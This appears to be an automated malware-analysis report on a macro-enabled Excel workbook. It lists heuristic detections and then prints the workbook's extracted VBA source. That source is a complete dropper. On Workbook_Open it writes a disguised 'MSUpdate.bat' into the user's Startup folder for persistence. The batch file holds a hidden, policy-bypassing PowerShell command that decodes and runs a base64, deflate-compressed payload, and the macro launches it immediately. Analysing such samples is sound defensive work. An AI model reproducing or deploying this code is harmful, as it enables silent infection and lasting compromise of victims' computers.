MALICIOUS
236
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (Path) -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
str = str + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
username = Environ$("UserName") -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5849 bytes |
SHA-256: ee5fe7e3b9e5979f7cfbac3caf40ef7fa8b8cb8e9d8b7fa1f622ef475b01c929 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
88 of 155 identifiers look randomly generated (e.g. 'sXLFGtQURyIkKQhRDcBe3hJENrkMufQ3VxdjIt1l') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim str As String
Dim Command As String
Dim exec As String
Dim username As String
username = Environ$("UserName")
Dim Path As String
Path = "C:\\Users\\" & username & "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\startup\\MSUpdate.bat"
Set FS = New FileSystemObject
Dim stream As TextStream
' Create a TextStream.
Set stream = FS.CreateTextFile(Path, True)
str = ""
str = str + "@echo off"
stream.WriteLine str
str = ""
str = str + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -"
str = str + "NoP -NonI -W Hidden -Exec Bypass -Command " + Chr(34) + "Invoke-"
str = str + "Expression $(New-Object IO.StreamReader ($(New-Obj"
str = str + "ect IO.Compression.DeflateStream ($(New-Object IO."
str = str + "MemoryStream (,$([Convert]::FromBase64String(\" + Chr(34) + "vVZ"
str = str + "Lj+M2DL7nVwiBDwnGHsiWX9lggN12UWCBoigwg/YQ5OCH3DHq2"
str = str + "IGtbDPb9r/XpEI6TruDQYH2QokiRX4iKUpOIR7E++Vi97FpPh2"
str = str + "OXW9Wy1913+pGBfdl0yzXe3E85U1diMFkZhz02Yxy8ak1P5pe/"
str = str + "FT35pQ1H5qmK1aXtd9ccapbI86X8eUyfllv/7Wfb3udGf30PA4"
str = str + "l+Tld7H52xeT5MrvyfVm59X4YPhe9eYvvgz4M2qz+bplPtXy/c"
str = str + "LoxkB/K0nt6OWrhjXty3X/UVd3Wpu5a4RTC+yE7aLH8uW5VsBR"
str = str + "eO3LDMSu0wJXvTm0BmoPwjtkwmOf+tHDOD0737t0syNKVZ19KG"
str = str + "JQdQrneit03L0bv9ntngIzKc1WMEp2OJN2MBBUnEksS6AgM+SM"
str = str + "pAxCEIMhHEgXoYcbKYsb6rJwAG4A3WY0kTwBWBmsxma8qmhVgN"
str = str + "ANTCkgMawnMJFqBWQAqBSrDNlkCQRYsa9CrJMGIkjkqxhwG5AP"
str = str + "3lpMAZgkGJyJASUiYJ+Vo2gHKfsqOUgJplRWgUuQt3JCe4ghZv"
str = str + "Vej8dXzKvCmESTArcCoBG8J6FUgVTmxQUh6GKboBnM4wxzHjA+"
str = str + "B5zNlv5gpW72bE3EhhSGZRxLlRDC/EahEEN2Ij48nQkdRRVK07"
str = str + "ANwjVgAX1TOYhVnlME8pHTHWHqS2KtCT8kbEpmwIJupIIwMgWM"
str = str + "uI9pRRlwHG84HY8kxKYwl3pAyGsXLFGtQURyIkKQhRDcBe3hJE"
str = str + "NrkMufQ3VxdjIt1lFIgUiAVlgAcKwGXKnjNSsr1HHKNW1bNpP9"
str = str + "k2c/+K8sYg7dYZvIGZcxbpTiDMWUBqzNVFFPJ2Z9q44aN2S+2q"
str = str + "qsyy6j0rrIPawW43BQ0m/J71XiwwnxGKvls6rWYKi4GrD9s9Zv"
str = str + "Ava52W/KSIjSRgGsSu54VQOzjiKQKWxW2tJQJKCu8AZu5lYhgI"
str = str + "InBLz4JaB714pIdKSbIxkzYuZVWtE1OjeJ/JZKv/ZQU2/owFT5"
str = str + "lRk71jPcSj8/1bFsQ9gg4YIZdOZ4VA6pgBn3O+VXBhWRAYVuX8"
str = str + "0JifBM0W+jAakwUd7OJpNhuMoJrH7mEygxvBT4s2OUxv5hzFGA"
str = str + "T9PkvoNheqRmQJim+7PbZwRrC3gkqOT8EeDlt801mxLaMCSm/9"
str = str + "ngvUzCgM/e60CeCyjb2IecSUBXFLH72oeIHSJVfsWd/KAnFVPt"
str = str + "0yquYgqDkPq6T7aLqerFy6ge5dWrhNXpkhuL+e93+Yp49fz2u3"
str = str + "t2txe/wy7t8M3f2n7lfOef7p25kVLBa3zn12hXj1p1T713hr8U"
str = str + "fojsZrz01zfbPhfMF/4mzT/KI2XXOLgzwP3w0WW+8x0bro/Aed"
str = str + "dG1pYBvpJR/AQ==\" + Chr(34) + ")))), [IO.Compression.Compression"
str = str + "Mode]::Decompress)), [Text.Encoding]::ASCII)).Read"
str = str + "ToEnd();" + Chr(34) + ") else (%WinDir%\syswow64\windowspowershe"
str = str + "ll\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec "
str = str + "Bypass -Command " + Chr(34) + "Invoke-Expression $(New-Object IO"
str = str + ".StreamReader ($(New-Object IO.Compression.Deflate"
str = str + "Stream ($(New-Object IO.MemoryStream (,$([Convert]"
str = str + "::FromBase64String(\" + Chr(34) + "vVZLj+M2DL7nVwiBDwnGHsiWX9lgg"
str = str + "N12UWCBoigwg/YQ5OCH3DHq2IGtbDPb9r/XpEI6TruDQYH2Qok"
str = str + "iRX4iKUpOIR7E++Vi97FpPh2OXW9Wy1913+pGBfdl0yzXe3E85"
str = str + "U1diMFkZhz02Yxy8ak1P5pe/FT35pQ1H5qmK1aXtd9ccapbI86"
str = str + "X8eUyfllv/7Wfb3udGf30PA4l+Tld7H52xeT5MrvyfVm59X4YP"
str = str + "he9eYvvgz4M2qz+bplPtXy/cLoxkB/K0nt6OWrhjXty3X/UVd3"
str = str + "Wpu5a4RTC+yE7aLH8uW5VsBReO3LDMSu0wJXvTm0BmoPwjtkwm"
str = str + "Of+tHDOD0737t0syNKVZ19KGJQdQrneit03L0bv9ntngIzKc1W"
str = str + "MEp2OJN2MBBUnEksS6AgM+SMpAxCEIMhHEgXoYcbKYsb6rJwAG"
str = str + "4A3WY0kTwBWBmsxma8qmhVgNANTCkgMawnMJFqBWQAqBSrDNlk"
str = str + "CQRYsa9CrJMGIkjkqxhwG5AP3lpMAZgkGJyJASUiYJ+Vo2gHKf"
str = str + "sqOUgJplRWgUuQt3JCe4ghZvVej8dXzKvCmESTArcCoBG8J6FU"
str = str + "gVTmxQUh6GKboBnM4wxzHjA+B5zNlv5gpW72bE3EhhSGZRxLlR"
str = str + "DC/EahEEN2Ij48nQkdRRVK07ANwjVgAX1TOYhVnlME8pHTHWHq"
str = str + "S2KtCT8kbEpmwIJupIIwMgWMuI9pRRlwHG84HY8kxKYwl3pAyG"
str = str + "sXLFGtQURyIkKQhRDcBe3hJENrkMufQ3VxdjIt1lFIgUiAVlgA"
str = str + "cKwGXKnjNSsr1HHKNW1bNpP9k2c/+K8sYg7dYZvIGZcxbpTiDM"
str = str + "WUBqzNVFFPJ2Z9q44aN2S+2qqsyy6j0rrIPawW43BQ0m/J71Xi"
str = str + "wwnxGKvls6rWYKi4GrD9s9ZvAva52W/KSIjSRgGsSu54VQOzji"
str = str + "KQKWxW2tJQJKCu8AZu5lYhgIInBLz4JaB714pIdKSbIxkzYuZV"
str = str + "WtE1OjeJ/JZKv/ZQU2/owFT5lRk71jPcSj8/1bFsQ9gg4YIZdO"
str = str + "Z4VA6pgBn3O+VXBhWRAYVuX80JifBM0W+jAakwUd7OJpNhuMoJ"
str = str + "rH7mEygxvBT4s2OUxv5hzFGAT9PkvoNheqRmQJim+7PbZwRrC3"
str = str + "gkqOT8EeDlt801mxLaMCSm/9ngvUzCgM/e60CeCyjb2IecSUBX"
str = str + "FLH72oeIHSJVfsWd/KAnFVPt0yquYgqDkPq6T7aLqerFy6ge5d"
str = str + "WrhNXpkhuL+e93+Yp49fz2u3t2txe/wy7t8M3f2n7lfOef7p25"
str = str + "kVLBa3zn12hXj1p1T713hr8UfojsZrz01zfbPhfMF/4mzT/KI2"
str = str + "XXOLgzwP3w0WW+8x0bro/AeddG1pYBvpJR/AQ==\" + Chr(34) + ")))), [IO"
str = str + ".Compression.CompressionMode]::Decompress)), [Text"
str = str + ".Encoding]::ASCII)).ReadToEnd();" + Chr(34) + ")"
stream.WriteLine str
str = ""
' Close the file.
stream.Close
Shell (Path)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18944 bytes |
SHA-256: c526b34a0a7ba52b9b278078bccc7f810cc7f4a5de0e34952150d14aef34f5c4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
221 of 423 identifiers look randomly generated (e.g. 'C3E9074B00FCD0FCDF03310CDC68D2522639816D') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.